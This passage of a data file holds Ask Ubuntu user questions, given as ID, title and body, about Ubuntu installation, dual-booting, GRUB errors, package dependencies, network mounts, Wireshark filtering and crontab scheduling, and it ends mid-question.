327879	help to decide the partition to install ubuntu	i have a pc running with windows 7 ultimate 64 bit version with 4 gig ram . i have a 320 gig hard disk , in which i have allocated 120 gig for windows 7 , 100 gig for ny files ( named ashwin in windows ) and rest 80-90 gig partitioned but empty ntfs partition.now where do i install ubuntu so that windows and data is safe . i got the option install with windows i selected it , it then shows select drive ( scsi1 ( 0,0,0 ) ( sda ) -320.1 gb ata wdc wd3200aajs-6 ) and allocate driver by dragging the divider below which shows 66.5gb and 59.3 gb respectively . which one do i go with ? i clicked advance partitioning it shows five devices : device , type , m.point , size . ( mb ) , used ( mb ) ... ... ... /dev/sda1 , ntfs , 104 , 35 ( windows 7 loader ) /dev/sda2 , ntfs , 104752 , 23604 /dev/sda3 , ntfs , 125829 , 10161 /dev/sda5 , ntfs , 89382 , 3221 when i checked size in properties it showed name of drive according to windows , used.gb , free , total . ashwin , 10.2 , 115.7 , 125.8 c drive , 23.6 , 81.1 , 104.8 new volume , 92.6mb , 89.3 , 89.4 except mentioned everything in gigabytes.ignore the last dots . i want to install it in new volume or using that space how do i do it ? explain in detail i 'm a beginner .
327881	how do i extend the path used by the awesome window manager run command ?	i have a bin directory in my home directory . i would like for the run : shortcut to search that bin directory as well . how do i add it to the run search path ?
327882	ca n't remove libreoffice writer from launcher	i updated from libreoffice 3.4 to 4.1 . then i uninstalled 3.4 . the links to libreoffice in the launcher still worked , but i wanted to use the main libreoffice icon instead of the individual app icons in the launcher . i was able to right click all of the icons and remove them from the launcher except writer . it does not have the option to remove it . any ideas how i can remove it ? thanks !
327889	how to make the volume change more gradually ?	so i 'm currently using ubuntu 13.04 on a lenovo thinkpad r61i laptop and the problem i have is that the actual sound volume does n't grow linearly with the change of the volume slider position : in the range from 0 % to 75 % it grows very slowly , but in the range from 75 % to 100 % does so very rapidly - so that a small change of the slider 's position corresponds to an unproportionally large change in volume . what might be the case and how can i fix it ? used to work well on ubuntu 11 . *
327894	pc does not restart after last kernel update	i was using ubuntu 12.04 perfectly im my desktop until last kernel update ( 3.2.0-51 ) . after the update proccess and reboot the system , the unity inteface didn ' t start . the only way to login in the system is by tty . i have tried the last kernel versions available in the computer , but i ca n't use the graphycal interface . until the text terminals is impossible to access the unity interface . if i do n't encounter a solution i will re-install the whole system . anybody can help me ?
327897	ubuntu 12.04.2 dual boot uefi windows 8 preinstalled cx21903w ultrabook	hi i have a problem trying to install ubuntu . the machine is a cx ultrabook model cx.21903w intel i5 with 500gb hard disk , 8 gb ram and 32 gb ssd . from installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) , and according to the steps guide : we create a partition from win8 ( 70 gb ) using the win8 program . confirm-securebootuefi=true . from win8 , shift + restart and from special menu we selected the uefi firmware setting . from bios option : option 1 ) disable secure boot . option 2 ) disable uefi ( not available ) from option 1 : three ways is available . with secure boot enable - > we ca n't even boot ubuntu . a red windows saying soft unproper signed . with secure boot disable - > and this config in boot device order : 1 - uefi : usb 2 - windows boot manger 3 - others with csm ( compatibility support module ) : enable - > grub appears and selecting try ubuntu then a black windows appears and nothing happens . the same result if install ubuntu is selected . with secure boot disable - > and this config in boot device order : 1 - usb ( no uefi ) 2 - windows boot manger 3 - others with csm ( compatibility support module ) : enable - > grub appears and selecting try ubuntu , - > ubuntu boots and we can even install it . rebooting and just changing the boot order as 1 - ubuntu [ ] 2 - windows boot manger 3 - others then nothings happens . booting from liveusb again and , as per instructed , making boot-repair ( a warning windows : ubuntu is working in legacy mode. ) . saving changes and rebooting , grub works but selecting ubuntu , a black windows appears and nothing happens . selecting win8 , win8 boots and works . up until now we are unable to install ubuntu . any suggestion will be welcomed . kind regards and thanks in advance .
327900	non bootable system - > ubuntu is installed fine but it does n't boot ! ?	i have a dell dimension 3000 and i am trying to make it a web server . i have tried installing the ubuntu server 13.04 and ubuntu desktop 13.04 . i have had no luck . the only thing that works is the live cd . it installs fine but it does n't boot . here are the stats of the machine : nvidia ge-force 8400 gs 512 mb card , two western digital 150 gb hdds ( ide ) , intel p4 2.66 ghz , 1gb of ram , intel pro/100 vm ethernet connection , acer t231h screen vga connection ( the touch part is plugged into another computer ) . hope someone can help . : - )
327901	how to know once a new application gets added into usc	is there any way so that i can get to know once any new application gets added into ubuntu software center ? do i have to join something for this ?
327905	disk space and mounted network share	my mounted drive is being calculated into disk space . i created a mount script that mounts a network share on boot but now approximately ten minutes after boot , my system is alerting me to low disk space . without the mount i know i have 45gb available . the mount is a nas that holds 5tb of space so obivously there is a conflict but i need to know how to correct the issue as ubuntu 12.04 desktop will not allow me to write any data to the free space on the drive . case $ 1 in start ) mount -t smbfs -o username=xxxxx , password=xxxxx server.fq.dn : /sharepoint /mnt/nas log_daemon_msg `` mounting nas box ... '' stop ) umount /mnt/nas log_daemon_msg `` unmounting nas box ... '' was the guts of the script and was taken mostly from skeleton in init.d edit : the mount point is not the problem as i mount and unmount just fine . the problem i am having is that ubuntu reads the mount point and takes into account it 's file size in calculating the total disk free space ( df -l ) . i can not make any new files on the system after the system checks the disk space while the nas is mounted . once it is unmounted however , i can continue about my day . i 'm just looking for a way to tell ubuntu to ignore the /mnt or /media directory when looking for total disk space free .
327906	can i play a game that 's installed into mint os in ubuntu ?	recently i installed linux mint os 15 into my laptop . ( i have both ubuntu 12.04 and mint 15 in my hard drive ) the question is : can i play a game thats installed into mint os in ubuntu ? example : i installed 0a.d . on mint ... then i found out that it would be more convenient to run the game in ubuntu because all my important files are in ubuntu . so , is there a way to play 0a.d in ubuntu ?
327907	archive manager error message in 12.04	i get an error message from archive manager in ubuntu 12.04 when i try to run a downloaded file called biosagentplus_568.exe . can someone help me ? ? i am a ubuntu newbie ,
327908	i am trying to download something from the software center and it wont download giving me this error	installarchives ( ) failed : selecting previously unselected package libnss3-1d : amd64 . ( reading database ... dpkg : warning : files list file for package 'wbritish ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'thunderbird-locale-en-us ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'myspell-en-za ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'mythes-en-us ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'hyphen-en-us ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'thunderbird-locale-en ' missing ; assuming package has no files currently installed ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % dpkg : unrecoverable fatal error , aborting : files list file for package 'firefox-locale-en ' is missing final newline
327910	wireless network not showing up in network list	i 'm using ubuntu 13.04 with gnome default theme . after installation , i configured wifi and it was working perfectly fine . but suddenly after couple of days its not connecting to my network . the biggest surprise is that the wifi menu is showing all the networks available except mine . laptop : acer aspire 5750z
327914	failed to boot window 7 after installing ubuntu 12.04 : invalid efi file path	i just installed ubuntu alongside window 7 by following the instructions on the internet . i can use ubuntu successfully . but i failed to boot window 7 . i got this error : invalid efi file path . i was looking at other similar posts . they mentioned something like `` '' window uefi '' , which i have no idea what is means . please can someone tell me how to boot window 7 again without losing everything on win 7 . update : i reboot my laptop again . i pressed f2 / f10 to launch boot manager . i changed the boot option : boot option # 1 : window blablabla boot option # 2 : ubuntu blablabla boot option # 3 : ubuntu blablabla then suddenly i was able to launch win 7 again . the weird thing was that it ran a disk scan / file scan after i logged onto my win7 account . and i was prompted to format the local disk ( : e ) , which was where i installed my ubuntu . i am very puzzled now . why cant i launch win 7 in grub , but i can do so after rearranging the win 7 boot option . should i really consider removing ubuntu , since i am worried i am going to lose my win 7 again ?
327916	how do i keep logged into websites so i do n't have to logging everytime ?	every time i start my browser i have to login to my yahoo email . also sometimes i have to login into gmail , or facebook or linkedin . when i used windows i did not have to keep logging into my accounts except maybe every two weeks or so . what do i need to do to stay logged in ?
327926	wireshark http request methods for get and post on wlan0	i ca n't seem to get the right information using wireshark . i 'm capturing on my wireless network , and i want to be able to inspect packets coming from users on my network . after capturing , i apply this filter : http.request.method == `` get '' || http.request.method == `` post '' the packets that come from my machine have my ip address as source , and the destination in plain text , such as `` askubuntu.com '' . however , when it 's anyone else , it wo n't display the destination in plain text , but rather as an address such as `` 12.34.56.789 '' and looking a the packet data gives me no clues as to the final destination . when the packets come from my pc , they look like this : any help would be greatly appreciated . edit : when i try to use a dns lookup on the addresses given by other machines on the network , they do n't turn up anything . i ca n't even ping those addresses ( host unreachable ) .
327927	efficient way to clear selections and select new item in kde dolphin in one step ?	i prefer kde 's default single click behavior in all cases except the following : starting situation : i have one or more files ( or folders ) selected already ( from some previous action ) i want to perform a different action ( such as deleting ) on a new file three steps are required : i have to first manually clear the existing selection ( such as using escape ) then i have to select the new file then i have to perform the action on the file if i instead used double-click as the default , it would eliminate at least one of those steps . but i want to keep using single click behavior . my question is how can i most efficiently clear an existing selection and make a new selection ( either files or folders ) in one action ? the suggested method should not rely on right clicking ( because the action i want to perform may not be in the context menu ) . and the method should not mix mouse and keyboard actions -- it should use one or the other for efficiency & simplicity . ideally , i want something as simple as the way it would work if i used double-click actions . in that case , a single left mouse click on a new item would clear prior selections and select the new item . how do i achieve that simplicity and efficiency while sticking with single click actions ?
327933	server to cache http data	i 'm looking for software for ubuntu where i can place my ubuntu server on my network in such a way that at the very least all http traffic is filtered through the ubuntu server . this way , i can make the software cache data http data . basically i have a bunch of computers that go in and out of here daily and they all download windows updates and a ton of other garbage over and over again . so , some kind of proxy software that can permanently cache data by mimetype or something is ideally what i 'm looking for . thanks in advance for your input !
327937	speller in gedit wo n't change words	i 'm using gedit and the speller actually highlight the misspelled words . but when i right-click the word and choose the correct word it wo n't change . also i ca n't choose to add a new word .
327938	what 's the difference between the python-django and django-rainbow charms ?	i 'm looking to deploy my django application using juju . quickly looking over the charm store , i noticed there are two different charms to do this . one simply named python-django and another called django-rainbow . the python-django charm is described like : this charm will install django . it can also install your django project and his dependencies from either a template or from a version control system . it can also link your project to a database and sync the schemas . this charm also come with a fabric fabfile to interact with the deployement in a cloud aware manner . and django-rainbow like so : django-rainbow is a full-fledged django web project deployment charm . one can deploy many projects onto a single instance by maintaining individual config files pertaining to the project . django-rainbow is a safe and convenient platform for development or production web server management . web sites are updated instantly using mercurial based versioning . your django-rainbow project file can be stored for future use , allowing anyone using juju a fail safe method to develop and deploy your project without creating conflicting structure . django-rainbow is a `` set it and forget it '' platform leaving development issues with the developers : ) what are the differences and why would i choose one over the other ?
327939	ufw python documentation	i 'm trying to access ufw with python , but on line 53 of backend.py , they raise a weird error that makes no sense : traceback ( most recent call last ) : file `` mymodule.py '' , line 1467 , in < module > print backend.ufwbackend ( 'notused ' , false ) .get_rules ( ) file `` /usr/lib/python2.7/dist-packages/ufw/backend.py '' , line 53 , in __init__ self._read_rules ( ) attributeerror : ufwbackend instance has no attribute '_read_rules' here 's the code that raises this error : backend.ufwbackend ( 'notused ' , false ) .get_rules ( ) there are minimal comments and doc strings throughout all of the code , and there unused and undeclared attributes and methods every where , so it 's been complicated to navigate .
327943	how to open `` trash '' through terminal ?	i tried opening trash by the command nautilus , but it gives me an error !
327946	ca n't install g++ ( worked fine before ? )	came back to my machine today , g++ wo n't run from the command line . output from sudo apt-get install g++ : the following packages have unmet dependencies : fglrx : depends : dkms but it is not installable depends : linux-headers-generic but it is not installable or linux-headers but it is not installable conflicts : fglrx-driver fglrx-amdcccle : conflicts : fglrx-control fglrx-amdcccle-updates : conflicts : fglrx-control fglrx-dev : conflicts : fglrx-driver-dev fglrx-updates : depends : dkms but it is not installable depends : linux-headers-generic but it is not installable or linux-headers but it is not installable conflicts : fglrx-driver fglrx-updates-dev : conflicts : fglrx-driver-dev nvidia-settings-updates : depends : screen-resolution-extra ( > = 0.12 ) but it is not installable apt log : start-date : 2013-08-02 10:52:41 commandline : apt-get install cpp- remove : x11-apps : i386 ( 7.6+5ubuntu1 ) , libgnome2-0 : i386 ( 2.32.1-2ubuntu1.1 ) , libidl-common : i386 ( 0.8.14-0.2ubuntu2 ) , x11-xserver-utils : i386 ( 7.6+3 ) , g++ : i386 ( 4.6.3-1ubuntu5 ) , cpp : i386 ( 4.6.3-1ubuntu5 ) , gcc : i386 ( 4.6.3-1ubuntu5 ) , libidl0 : i386 ( 0.8.14-0.2ubuntu2 ) , libbonobo2-0 : i386 ( 2.32.1-0ubuntu1.1 ) , x11-session-utils : i386 ( 7.6+2 ) , acpi-support : i386 ( 0.140.1 ) , x11-xserver-utils-lts-quantal : i386 ( 7.7~3ubuntu1~precise1 ) , liborbit2 : i386 ( 2.14.19-0.1ubuntu1 ) , xorg : i386 ( 7.6+12ubuntu2 ) , libgnome2-bin : i386 ( 2.32.1-2ubuntu1.1 ) end-date : 2013-08-02 10:53:00 start-date : 2013-08-02 13:58:26 commandline : apt-get autoremove remove : xorg-docs-core : i386 ( 1.6-1ubuntu2 ) , g++-4.6 : i386 ( 4.6.3-1ubuntu5 ) , x11-xfs-utils : i386 ( 7.6+1 ) , toshset : i386 ( 1.76-2 ) , acpid : i386 ( 2.0.10-1ubuntu3 ) , xinit : i386 ( 1.3.1-1 ) , libbonobo2-common : i386 ( 2.32.1-0ubuntu1.1 ) , libstdc++6-4.6-dev : i386 ( 4.6.3-1ubuntu5 ) end-date : 2013-08-02 13:58:38 apt sources : # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release i386 ( 20130213 ) ] / precise main restricted deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise universe deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-security main restricted deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-security main restricted deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-security universe deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-security universe deb ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-security multiverse deb-src ht.tp : //us.archive.ubuntu.com/ubuntu/ precise-security multiverse # deb ht.tp : //archive.canonical.com/ubuntu precise partner # deb-src ht.tp : //archive.canonical.com/ubuntu precise partner deb ht.tp : //extras.ubuntu.com/ubuntu precise main deb-src ht.tp : //extras.ubuntu.com/ubuntu precise main deb ht.tp : //archive.ubuntu.com/ubuntu precise restricted main can anyone tell me whats going on here ?
327950	grub rescue toughies	i booted a custom distro from a live cd . i decided to dual boot with winxp , so i created a small partition and installed the os . there was a little incompatibility with the processors that i fixed , but in the middle of using the os , the desktop stalled so i hard reset the desktop by holding the power button for 3 seconds . i power back up , and i 'm sent to grub rescue . i 'm familiar with grub rescue 's extremely limited command line . i check the `` set '' and the root and prefix is correct . so i try to load the normal.mod so that i could use the regular grub command line and boot manually from there . however i encountered a singular problem : error : reloc offset is out of segment grub rescue > set prefix = ( hd0,5 ) /boot/grub root = hd0,5 grub rescue > insmod ( hd0,5 ) /boot/grub/normal.mod error : reloc offset is out of segment my question : what does reloc offset is out of segment mean , and how do i fix it . i really do not want to make another live cd or use a windows recovery disc to restore the mbr .
327951	removing earlier versions of installed package ?	apt-cache show firefox | grep version and apt-cache show chromium-browser | grep version in terminal is showing this output : i guess , i 've four versions of firefox and two versions of chromium-browser installed on my system . how can i safely uninstall the earlier versions of both , firefox and chromium ? it would help me for other softwares also , and always in future . thank you !
327957	dual-booting - > how to install ubuntu by sharing separated /home partition of first linux os ?	i have a little question about home partition . for example : iâve had a fedora installation with separate home partition . after some time i decided to try ubuntu . so after the ubuntu installation i actually have two /home . the first one is related to ubuntu and placed under the root tree of it ( / ) . so the second one moved under /media ( this is the original home partition which i 've used under fedora ) . so my question is about this situation , is it normal practice/situation for the people how want to keep their previous home partition and it 's contents under new linux installation ? i mean is this ok to have actually two /home , or i just `` lost '' something while installing other distro ?
327958	i accidentally formatted my hard disk containing ubuntu partition	i accidentally formatted my hard disk containing ubuntu partition . i also run a windows vista . i formatted my 2nd hdd , the ubuntu partition . after i reboot i 'm getting a message error : no such device:2fe5264c-df46-4507-9eee-8a7f1335c846 grub rescue > '' i also tried to boot from my livecd by changing the bios menu . i tried the following settings in the bios 1st boot - cdrom \ usb 2nd boot - hdd \ cdrom \disabled 3rd boot - usb \ hdd \disabled still the same error is repeated . i also tried the following commands grub rescue > ls ( hd0 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos1 ) ( fd0 ) grub rescue > ls ( hd0 ) /boot in all possible combinations i get the error error : unknown filesystem except for the command ls ( fd0 ) \boot i get error : fd0 read error . i totally formatted my 2nd hdd . my system is desktop , p4 , hdd1 80gib ( vista ) , hdd2 30gib ( ubuntu ) ( formatted ) , 1gib ddr ram . now i can not even load my windows os . i also tried to install windows 8 using usb and livecd , but it did n't work . i ca n't even read my cd or usb drives . please someone help me .
327960	can not see shared folder in /mnt/hgfs	i am trying to share a folder between lubuntu 13.04 ( in vmware player ) and windows 7 64 bit . i followed a tutorial till step 16 . i typed a command and saw nothing . i also went into the /mnt/hgfs folder and saw nothing there . how do i fix this ? http : //theholmesoffice.com/how-to-share-folders-between-windows-and-ubuntu-using-vmware-player/ command - dir /mnt/hgfs extras - by the way , this is how i actually reached step 16 . step 12 - sudo apt-get install hgfsclient step 14 - if it does not work , then follow this tutorial - http : //www.liberiangeek.net/2013/03/how-to-quickly-install-vmware-tools-in-ubuntu-13-04-raring-ringtail/ step 16 - stuck ! ! !
327962	ubuntu 13.04 not usb tethering through android	just upgraded to 13.04 . now my internet does n't work anymore through my galaxy note 2 . it used to work perfectly in 12.10 without a hitch . the phone 's got android 4.1 there 's no error message . the phone connects , ubuntu pops up with a message that it found a new network , and shows that this is connected . but nothing wants to link on the internet , not firefox , not thunderbird , not even the software centre .
327967	sharing ssh keys during a juju charm deployment	i have a juju charm for specific cluster service . in manual deployments , the password-less ssh access for the cluster administrator is enabled between the control-system nodes and the other nodes in the cluster . i 'd like my juju charm to automate that process . in simple terms : the service is deployed across nodes each node has a user account created for the service-owner 1 or more of those nodes will have the control system packages the goal is passwordless ssh access to all nodes for the service-owner on that small sub-set of nodes i was thinking about shoving the public key into a relation property for the peer relation between the nodes ... and just reading it from the other end . but the mechanics of relation-relation-changed are such that i 'm already seeing that routine called n-factorial times for an n-node cluster . i 'd rather not add more complexity there if i can avoid it .
327971	how to remove packages from my own debian package ?	i know the basics of creating a debian package . but i wish to create one that marks other packages for removal as it is installed . under the debian folder of the package at the control file , i tried to put the packages that i desire to be removed under the conflicts or breaks field , but with no success . apt-get refuses to install my package and does not remove the packages either under conflicts or breaks ... what i 'm missing ? could n't find the appropriate directions under the debian manuals ...
327974	12.04 gvfs-afc-volume cpu usage high , no iphone	i 've notice many people reporting this problem and i 'm suffering from it too on ubuntu 12.04 . i 'm using gvfs for android support , but i rarely connect to any gvfs devices yet this problem appears all the time . top : pid user pr ni virt res shr s % cpu % mem time+ command 32100 ea 20 0 38700 2872 2412 s 102 0.1 25:57.01 gvfs-afc-volume 6775 ea 20 0 2848 1172 880 r 6 0.1 0:00.05 top 1 root 20 0 3748 1992 1292 s 0 0.1 0:06.86 init ( rest are idle ) i kill the process and everything is fine , but it seems to happen about once or twice an hour . i have n't seen anything in particular that triggers it . often i 'm just programming with no audio apps running ( audio is muted too ) or usb activity . i saw this bug report https : //bugzilla.redhat.com/show_bug.cgi ? id=679988 but nothing is happening there . i could install cpulimit , but i want to try to fix the issue . does anyone know what to do ? is there any way to disable this process and what would it harm ?
327975	ubuntu for android !	pl . tell me how to install ubuntu on android tablet or phone . another thing is i 'm not using ubuntu desktop and i 'm using windows . so tell me what to do to install ubuntu on android . thanks ...
327978	crontab woes -- - help me figure out why it 's not running	i 'm having troubles creating a crontab that executes a series of php scripts when i specify it . from what i can tell the cron does n't even run ... also if someone knows a method to allow me to run multiple php scripts at once that 'd be great ! # # data upload stream 1 30 09,11,13,15,17,19,21,23 * * 1-5 /php_scripts/php pushcsv.php -- system=ic -a=/data/cp.csv & & /php_scripts/php pushcsv.php -- system=ic -g=/data/g.csv # # # data upload stream 2 0 22 * * 1-5 /php_scripts/php pushcsv.php -- system=ss -d=/data/d.csv & & ( /php_scripts/php pushcsv.php -- system=ss -c=/data/c_east.csv ; /php_scripts/php pushcsv.php -- system=ss -c=/data/c_central.csv ; /php_scripts/php pushcsv.php -- system=ss -c=/data/c_west.csv ) & & ( php pushcsv.php -- system=dw -u=/data/u_701.csv ; php pushcsv.php -- system=dw -u=/data/u_702.csv ; php pushcsv.php -- system=dw -u=/data/u_703.csv ; php pushcsv.php -- system=dw -u=/data/u_704.csv ; php pushcsv.php -- system=dw -u=/data/u_705.csv ; php pushcsv.php -- system=dw -u=/data/u_706.csv ; php pushcsv.php -- system=dw -u=/data/u_707.csv ; php pushcsv.php -- system=dw -u=/data/u_708.csv ; php pushcsv.php -- system=dw -u=/data/u_709.csv ; php pushcsv.php -- system=dw -u=/data/u_710.csv ; php pushcsv.php -- system=dw -u=/data/u_713.csv ; php pushcsv.php -- system=dw -u=/data/u_751.csv ; php pushcsv.php -- system=dw -u=/data/u_752.csv ; php pushcsv.php -- system=dw -u=/data/u_753.csv ; php pushcsv.php -- system=dw -u=/data/u_754.csv ; php pushcsv.php -- system=dw -u=/data/u_755.csv ; php pushcsv.php -- system=dw -u=/data/u_756.csv ; php pushcsv.php -- system=dw -u=/data/u_757.csv ; php pushcsv.php -- system=dw -u=/data/u_758.csv ; php pushcsv.php -- system=dw -u=/data/u_759.csv ; php pushcsv.php -- system=dw -u=/data/u_760.csv ; php pushcsv.php -- system=dw -u=/data/u_761.csv ; php pushcsv.php -- system=dw -u=/data/u_762.csv ) # # # # data upload stream 3 0 22 6 1 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 6 2 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) # 0 22 6 3 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 4 4 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_709.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_710.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_713.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_751.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_752.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_753.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_754.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_755.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_756.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_757.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_758.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_759.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_760.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_761.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_762.csv ) 0 22 6 5 * ( /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_701.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_702.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_703.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_704 ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_705.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_706.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_707.csv ; /php_scripts/php pushcsv.php -- system=dw -r=/data/ar_708.csv ; /php_scripts/php pushcsv.php -- system=dw 